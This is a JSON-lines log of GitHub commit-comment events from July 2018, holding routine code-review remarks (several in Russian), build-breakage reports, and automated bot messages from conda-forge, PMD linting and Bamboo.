{"id":"7939177990","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29645506,"position":null,"line":null,"path":null,"commit_id":"c76de7d3e17d41287b888fe09eec61b651288187","created_at":"2018-07-09T17:57:05Z","updated_at":"2018-07-09T17:57:05Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [buttons are cut off on mobile](https://trello.com/c/TThDOR2R/36-buttons-are-cut-off-on-mobile)"}},"created_at":"2018-07-09T17:57:05Z"}
{"id":"7939182403","type":"CommitCommentEvent","actor":{"login":"TShapinsky"},"repo":{"name":"tensorflow/tensorflow"},"payload":{"comment":{"id":29645516,"position":14,"line":54,"path":"tensorflow/contrib/lite/examples/android/app/build.gradle","commit_id":"d88774f02723a9dc2a10f9c8846ae9ec1a434f51","created_at":"2018-07-09T17:57:55Z","updated_at":"2018-07-09T17:57:55Z","author_association":"NONE","body":"this seems to prevent a proper build with a fresh version of the repo."}},"created_at":"2018-07-09T17:57:55Z"}
{"id":"7939186055","type":"CommitCommentEvent","actor":{"login":"g5v991x"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29645523,"position":null,"line":null,"path":null,"commit_id":"c33766f2fc94189f66eb9a8287a5e0ea2ea35786","created_at":"2018-07-09T17:58:38Z","updated_at":"2018-07-09T17:58:38Z","author_association":"CONTRIBUTOR","body":"I have a feeling this will break quite a few things..."}},"created_at":"2018-07-09T17:58:38Z"}
{"id":"7939189078","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29645526,"position":42,"line":38,"path":"my_game.rb","commit_id":"a74b3ec6f590470dbb746c7e6d9bfc265dd2d07d","created_at":"2018-07-09T17:59:13Z","updated_at":"2018-07-09T17:59:13Z","author_association":"NONE","body":"37 и 38 я бы скорее в раунде сделал\r\nу тебя там как раз в методе `run` похожие ресеты происходят для остальных переменных"}},"created_at":"2018-07-09T17:59:13Z"}
{"id":"7939190349","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29645531,"position":17,"line":13,"path":"my_game.rb","commit_id":"a74b3ec6f590470dbb746c7e6d9bfc265dd2d07d","created_at":"2018-07-09T17:59:27Z","updated_at":"2018-07-09T17:59:27Z","author_association":"NONE","body":"некоторое дублирование, тут создается раунд\r\nи в `continue` тоже\r\nя бы скорее поместил петлю сюда, после 9 строки \r\nа строки 10 и 11 убрал совсем\r\nиз петли можно вызвать метод `continue` (там оставить все как есть, только петлю убрать) и вроде все будет хорошо...\r\nнет?\r\n"}},"created_at":"2018-07-09T17:59:27Z"}
{"id":"7939196836","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29645551,"position":8,"line":34,"path":"player.rb","commit_id":"a74b3ec6f590470dbb746c7e6d9bfc265dd2d07d","created_at":"2018-07-09T18:00:40Z","updated_at":"2018-07-09T18:00:40Z","author_association":"NONE","body":"при использовании `times` не обязательно использовать аргумент в блоке\r\nт.е. его вообще можно убрать, раз уж ты его не используешь"}},"created_at":"2018-07-09T18:00:40Z"}
{"id":"7939196990","type":"CommitCommentEvent","actor":{"login":"hleb-albau"},"repo":{"name":"cybercongress/cyb"},"payload":{"comment":{"id":29645553,"position":4,"line":39,"path":".circleci/config.yml","commit_id":"2ec122502a267c936295e099d6eb36d6e5eb36f8","created_at":"2018-07-09T18:00:42Z","updated_at":"2018-07-09T18:00:42Z","author_association":"MEMBER","body":"cool"}},"created_at":"2018-07-09T18:00:42Z"}
{"id":"7939198769","type":"CommitCommentEvent","actor":{"login":"bearloga"},"repo":{"name":"hebrewseniorlife/memor"},"payload":{"comment":{"id":29645556,"position":null,"line":null,"path":null,"commit_id":"26fb2737ce0dad03ddb84357bc80d9cca68f64f1","created_at":"2018-07-09T18:00:59Z","updated_at":"2018-07-09T18:00:59Z","author_association":"CONTRIBUTOR","body":"Aw, thanks! ^_^"}},"created_at":"2018-07-09T18:00:59Z"}
{"id":"7939200106","type":"CommitCommentEvent","actor":{"login":"stasgm"},"repo":{"name":"gsbelarus/gdmn-back"},"payload":{"comment":{"id":29645562,"position":8,"line":7,"path":"README.md","commit_id":"3af606043982163e72fabee5e80f59cc3905e87f","created_at":"2018-07-09T18:01:12Z","updated_at":"2018-07-09T18:01:12Z","author_association":"NONE","body":"А то такой как я добавит с именем файла и будет рыдать)"}},"created_at":"2018-07-09T18:01:12Z"}
{"id":"7939207913","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/discretisedfield-feedstock"},"payload":{"comment":{"id":29645572,"position":null,"line":null,"path":null,"commit_id":"34ac7fd89058575af44fa09a60a6ab9a48638c30","created_at":"2018-07-09T18:02:35Z","updated_at":"2018-07-09T18:02:35Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @davidcortesortuno were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @davidcortesortuno were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T18:02:35Z"}
{"id":"7939208577","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"yuneszadi/BlackJack"},"payload":{"comment":{"id":29645574,"position":8,"line":34,"path":"player.rb","commit_id":"a74b3ec6f590470dbb746c7e6d9bfc265dd2d07d","created_at":"2018-07-09T18:02:44Z","updated_at":"2018-07-09T18:02:44Z","author_association":"NONE","body":"и еще мне кажется, что этот метод неверно отработает, если к примеру пришли 2, туз, туз... должно быть 14 очков, а он мне кажется посчитает 4... \r\nнет?"}},"created_at":"2018-07-09T18:02:44Z"}
{"id":"7939214835","type":"CommitCommentEvent","actor":{"login":"JZ6"},"repo":{"name":"ReactiveX/rxjs"},"payload":{"comment":{"id":29645585,"position":null,"line":null,"path":null,"commit_id":"7e9e6bd4c76d02775e42c0f806ffe5bbf5f8cf7f","created_at":"2018-07-09T18:03:55Z","updated_at":"2018-07-09T18:03:55Z","author_association":"NONE","body":"Cool"}},"created_at":"2018-07-09T18:03:55Z"}
{"id":"7939218140","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29645591,"position":null,"line":null,"path":null,"commit_id":"c33766f2fc94189f66eb9a8287a5e0ea2ea35786","created_at":"2018-07-09T18:04:31Z","updated_at":"2018-07-09T18:04:31Z","author_association":"CONTRIBUTOR","body":"I figured that path names based on the set names would help keep cell tomography projects organized; however, flipping the file names around isn't necessary. It just makes the project directory look a lot more organized. What do you think this will break? I'm happy to revert the commit if necessary."}},"created_at":"2018-07-09T18:04:31Z"}
{"id":"7939223065","type":"CommitCommentEvent","actor":{"login":"edolstra"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29645605,"position":null,"line":null,"path":null,"commit_id":"298e170b36b79f4c6b19816a7abbf8392a490840","created_at":"2018-07-09T18:05:28Z","updated_at":"2018-07-09T18:05:28Z","author_association":"MEMBER","body":"This is a breaking change, which is not allowed on the stable branch:\r\n```\r\n# nixos-rebuild switch\r\nbuilding Nix...\r\nbuilding the system configuration...\r\nerror: attribute 'linux_testing' missing, at /nix/store/yhp876r4qxkalrg839vhvn2rjry09wrc-nixos-18.03.132835.e930c685d51/nixos/pkgs/top-level/all-packages.nix:13500:44\r\n(use '--show-trace' to show detailed location information)\r\n```\r\nPlease revert."}},"created_at":"2018-07-09T18:05:28Z"}
{"id":"7939224278","type":"CommitCommentEvent","actor":{"login":"vi"},"repo":{"name":"xd009642/tarpaulin"},"payload":{"comment":{"id":29645609,"position":5,"line":62,"path":"src/main.rs","commit_id":"4e61b8ffb9b1c5a9fe6b94d22149a027d4f03239","created_at":"2018-07-09T18:05:43Z","updated_at":"2018-07-09T18:05:43Z","author_association":"NONE","body":"Maybe then it should not be `-o` or `--out`? It's typically path where to put report.\r\n\r\nMaybe better `-f` (`--format`)?"}},"created_at":"2018-07-09T18:05:43Z"}
{"id":"7939225682","type":"CommitCommentEvent","actor":{"login":"Backurio"},"repo":{"name":"Backurio/Match3Replica"},"payload":{"comment":{"id":29645615,"position":null,"line":null,"path":null,"commit_id":"0ddffa7da589c857e8f6be4f4ed078147a22b10a","created_at":"2018-07-09T18:06:00Z","updated_at":"2018-07-09T18:06:00Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [add fire totem games logo to splash screen](https://trello.com/c/vyN6I8Tk/37-add-fire-totem-games-logo-to-splash-screen)"}},"created_at":"2018-07-09T18:06:00Z"}
{"id":"7939227423","type":"CommitCommentEvent","actor":{"login":"tmirmota"},"repo":{"name":"petermirmo/ghostit-dev"},"payload":{"comment":{"id":29645618,"position":21,"line":34,"path":"client/src/components/CampaignModal/index.js","commit_id":"1c1672c1c1ce56c26d533527529943b62c97a560","created_at":"2018-07-09T18:06:22Z","updated_at":"2018-07-09T18:06:22Z","author_association":"COLLABORATOR","body":"Well done! "}},"created_at":"2018-07-09T18:06:22Z"}
{"id":"7939233793","type":"CommitCommentEvent","actor":{"login":"itsjohnward"},"repo":{"name":"gro-intelligence/tilemill"},"payload":{"comment":{"id":29645636,"position":null,"line":null,"path":null,"commit_id":"dc19d6693156c317800654414c7ab0ed455724ff","created_at":"2018-07-09T18:07:40Z","updated_at":"2018-07-09T18:07:40Z","author_association":"COLLABORATOR","body":"https://github.com/mapbox/node-zipfile/commit/123f52d9961aeb0058d684a18909105d9794d6fb"}},"created_at":"2018-07-09T18:07:40Z"}
{"id":"7939255475","type":"CommitCommentEvent","actor":{"login":"sambayless"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29645694,"position":null,"line":null,"path":null,"commit_id":"631dd7a4e974547b9ff483401e5256fa5aa3797e","created_at":"2018-07-09T18:11:59Z","updated_at":"2018-07-09T18:11:59Z","author_association":"NONE","body":"Actually, this pushed me to come up with a better solution. \r\nI've added a cmake option to install the Python lib (optionally with cython, too) directly from cmake:\r\nYou can now just do:\r\n```\r\n$cmake -DPYTHON=ON -DCYTHON=ON .\r\n$make\r\n$make install\r\n```\r\n\r\nThis will cause cmake to configure the setup.py with the correct file locations for out of source builds, and then make install will now actually call setup.py and perform the installation, too. If you set -DCYTHON=ON in cmake, then you no longer need to us ethe MONOSAT_CYTHON environment variable, either.\r\n\r\nYou can continue using your current installation script without modification, but if you wish you can switch to this new solution, which is cleaner.\r\n"}},"created_at":"2018-07-09T18:11:59Z"}
{"id":"7939257726","type":"CommitCommentEvent","actor":{"login":"lpdmagee"},"repo":{"name":"RBVI/CyPlot"},"payload":{"comment":{"id":29645702,"position":null,"line":null,"path":null,"commit_id":"0958f32e11cd3fd7023f640f80a3828de76bafb0","created_at":"2018-07-09T18:12:26Z","updated_at":"2018-07-09T18:12:26Z","author_association":"COLLABORATOR","body":"Also: Currently trying to get the Plotly html file to open up from CyBrowser upon opening the app via the \"html\" string variable. This has been unsuccessful thus far."}},"created_at":"2018-07-09T18:12:26Z"}
{"id":"7939258513","type":"CommitCommentEvent","actor":{"login":"zephyr007"},"repo":{"name":"VibhorCodecianGupta/Bulls-and-Bears"},"payload":{"comment":{"id":29645704,"position":null,"line":null,"path":null,"commit_id":"501fba0cfaf6a1aeba7bb662e96c0821c243f9a9","created_at":"2018-07-09T18:12:35Z","updated_at":"2018-07-09T18:12:35Z","author_association":"NONE","body":"sync to forked"}},"created_at":"2018-07-09T18:12:35Z"}
{"id":"7939259085","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29645706,"position":39,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/drawerlayout/DrawerLayoutActivity.java","commit_id":"48a520c66d750ecfe855bb4172012ce491f8f056","created_at":"2018-07-09T18:12:42Z","updated_at":"2018-07-09T18:12:42Z","author_association":"NONE","body":"WARNING: [SuspiciousConstantFieldName] The field name indicates a constant but its modifiers do not\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#SuspiciousConstantFieldName"}},"created_at":"2018-07-09T18:12:42Z"}
{"id":"7939259118","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29645707,"position":186,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/drawerlayout/DrawerLayoutActivity.java","commit_id":"48a520c66d750ecfe855bb4172012ce491f8f056","created_at":"2018-07-09T18:12:42Z","updated_at":"2018-07-09T18:12:42Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not start with capital letters\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-09T18:12:42Z"}
{"id":"7939259143","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29645708,"position":6,"line":null,"path":"app/src/at-lambui/java/asiantech/internship/summer/drawerlayout/OnClickListener.java","commit_id":"48a520c66d750ecfe855bb4172012ce491f8f056","created_at":"2018-07-09T18:12:42Z","updated_at":"2018-07-09T18:12:42Z","author_association":"NONE","body":"ERROR: [MethodNamingConventions] Method names should not start with capital letters\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/naming.html#MethodNamingConventions"}},"created_at":"2018-07-09T18:12:42Z"}
{"id":"7939259537","type":"CommitCommentEvent","actor":{"login":"jjallaire"},"repo":{"name":"nstrayer/activity_detection_post"},"payload":{"comment":{"id":29645709,"position":null,"line":null,"path":null,"commit_id":"2920686de84cd4192a38535e538c58b646026271","created_at":"2018-07-09T18:12:46Z","updated_at":"2018-07-09T18:12:46Z","author_association":"CONTRIBUTOR","body":"Okay, let us know when you've made changes based on the comments from @skeydan then we'll be ready to go. I am converting the TF blog over to Radix this week so we'll publish this as soon as that is done.\r\n"}},"created_at":"2018-07-09T18:12:46Z"}
{"id":"7939261923","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29645714,"position":8,"line":21,"path":"station.rb","commit_id":"ef8dc071d5ec87ed1e9cf17ee0c2101150f3f184","created_at":"2018-07-09T18:13:16Z","updated_at":"2018-07-09T18:13:16Z","author_association":"NONE","body":"в этом методе смысла нет, т.к. есть ридер в 8 строке, который делает то же самое - возвращает значение переменной `@trains`"}},"created_at":"2018-07-09T18:13:16Z"}
{"id":"7939263427","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29645719,"position":null,"line":null,"path":null,"commit_id":"51d3db16d6ccfa8433647d0e58f87a24033cc3ed","created_at":"2018-07-09T18:13:34Z","updated_at":"2018-07-09T18:13:34Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-35](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-35).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-35-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-09T18:13:34Z"}
{"id":"7939271203","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29645740,"position":14,"line":14,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-09T18:15:11Z","updated_at":"2018-07-09T18:15:11Z","author_association":"NONE","body":"сообщение не очень подходящее )"}},"created_at":"2018-07-09T18:15:11Z"}
{"id":"7939273581","type":"CommitCommentEvent","actor":{"login":"aitmlouk"},"repo":{"name":"aitmlouk/test11"},"payload":{"comment":{"id":29645751,"position":null,"line":null,"path":null,"commit_id":"30e6d88eaf4390ed3c00a2c0110011806f48fcc8","created_at":"2018-07-09T18:15:36Z","updated_at":"2018-07-09T18:15:36Z","author_association":"OWNER","body":"commit test"}},"created_at":"2018-07-09T18:15:36Z"}
{"id":"7939273845","type":"CommitCommentEvent","actor":{"login":"xd009642"},"repo":{"name":"xd009642/tarpaulin"},"payload":{"comment":{"id":29645752,"position":5,"line":62,"path":"src/main.rs","commit_id":"4e61b8ffb9b1c5a9fe6b94d22149a027d4f03239","created_at":"2018-07-09T18:15:39Z","updated_at":"2018-07-09T18:15:39Z","author_association":"OWNER","body":"Maybe, however that would be a breaking change. I'll consider phasing it in so all 4 work then removing `--out` and `-o` for version `0.7`"}},"created_at":"2018-07-09T18:15:39Z"}
{"id":"7939274858","type":"CommitCommentEvent","actor":{"login":"gallowaymark19"},"repo":{"name":"gallowaymark19/basics"},"payload":{"comment":{"id":29645758,"position":1,"line":1,"path":"README.md","commit_id":"625c22af9192d29b6dd345f922a70afb622dc8e1","created_at":"2018-07-09T18:15:52Z","updated_at":"2018-07-09T18:15:52Z","author_association":"OWNER","body":"This is a comment"}},"created_at":"2018-07-09T18:15:52Z"}
{"id":"7939279516","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29645765,"position":9,"line":9,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-09T18:16:47Z","updated_at":"2018-07-09T18:16:47Z","author_association":"NONE","body":"что ты тут напутал )\r\nесли использовать \"пуш\", то работать будет так:\r\n```\r\n$ irb\r\n2.5.1 :001 > ar = [1, 2, 3]\r\n => [1, 2, 3] \r\n2.5.1 :002 > ar.push(-2, 5)\r\n => [1, 2, 3, -2, 5] \r\n2.5.1 :003 >\r\n```\r\nздесь нужен другой метод )"}},"created_at":"2018-07-09T18:16:47Z"}
{"id":"7939283740","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29645773,"position":20,"line":20,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-09T18:17:39Z","updated_at":"2018-07-09T18:17:39Z","author_association":"NONE","body":"название не очень\r\nты же печатаешь имена станций, а не возвращаешь объект станции\r\nкак-то так и надо назвать"}},"created_at":"2018-07-09T18:17:39Z"}
{"id":"7939284561","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29645774,"position":null,"line":null,"path":null,"commit_id":"68db7f7591f83d3876d787f593bc771eafe3c252","created_at":"2018-07-09T18:17:49Z","updated_at":"2018-07-09T18:17:49Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [wphttperr](https://wphttperr-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/wordpress-known-issues](https://wphttperr-static-docs.pantheonsite.io/docs/wordpress-known-issues)\n"}},"created_at":"2018-07-09T18:17:49Z"}
{"id":"7939287485","type":"CommitCommentEvent","actor":{"login":"xd009642"},"repo":{"name":"xd009642/tarpaulin"},"payload":{"comment":{"id":29645777,"position":5,"line":62,"path":"src/main.rs","commit_id":"4e61b8ffb9b1c5a9fe6b94d22149a027d4f03239","created_at":"2018-07-09T18:18:24Z","updated_at":"2018-07-09T18:18:24Z","author_association":"OWNER","body":"Flash decision, I'll get it changed to `-f` and `--format` in issue #55 "}},"created_at":"2018-07-09T18:18:24Z"}
{"id":"7939287530","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"dastanabeuov/rewrite"},"payload":{"comment":{"id":29645778,"position":23,"line":23,"path":"route.rb","commit_id":"983de5adfdfbe3dab8b58a5de7fba977b0293fd5","created_at":"2018-07-09T18:18:25Z","updated_at":"2018-07-09T18:18:25Z","author_association":"NONE","body":"еще можно добавить методы, которые бы реализовывали вот этот текст из ТЗ: \"Имеет начальную и конечную станцию\""}},"created_at":"2018-07-09T18:18:25Z"}
{"id":"7939291778","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645785,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-09T18:19:17Z","updated_at":"2018-07-09T18:19:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:19:17Z"}
{"id":"7939291904","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645787,"position":null,"line":null,"path":null,"commit_id":"b743c93a2505b2b6701159344167851ea1b8b857","created_at":"2018-07-09T18:19:19Z","updated_at":"2018-07-09T18:19:19Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:19:19Z"}
{"id":"7939292077","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645788,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-09T18:19:21Z","updated_at":"2018-07-09T18:19:21Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:19:21Z"}
{"id":"7939297806","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645799,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-09T18:20:28Z","updated_at":"2018-07-09T18:20:28Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:20:28Z"}
{"id":"7939298031","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645800,"position":null,"line":null,"path":null,"commit_id":"4e7bd3b031258eac1a7735d660d9462764a31626","created_at":"2018-07-09T18:20:31Z","updated_at":"2018-07-09T18:20:31Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:20:31Z"}
{"id":"7939298083","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645802,"position":null,"line":null,"path":null,"commit_id":"d846bee7b995a60038d1ab284be4b15525c7a5fa","created_at":"2018-07-09T18:20:32Z","updated_at":"2018-07-09T18:20:32Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:20:32Z"}
{"id":"7939301744","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/tox-feedstock"},"payload":{"comment":{"id":29645815,"position":null,"line":null,"path":null,"commit_id":"26a38d975eed75a7bd85fc0a93a49a21cf18191a","created_at":"2018-07-09T18:21:14Z","updated_at":"2018-07-09T18:21:14Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @kalefranz were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-09T18:21:14Z"}
{"id":"7939303696","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29645822,"position":null,"line":null,"path":null,"commit_id":"00b7483b5b50f7e4bb5018976b57fec6cbe53cd4","created_at":"2018-07-09T18:21:38Z","updated_at":"2018-07-09T18:21:38Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-09T18:21:38Z"}
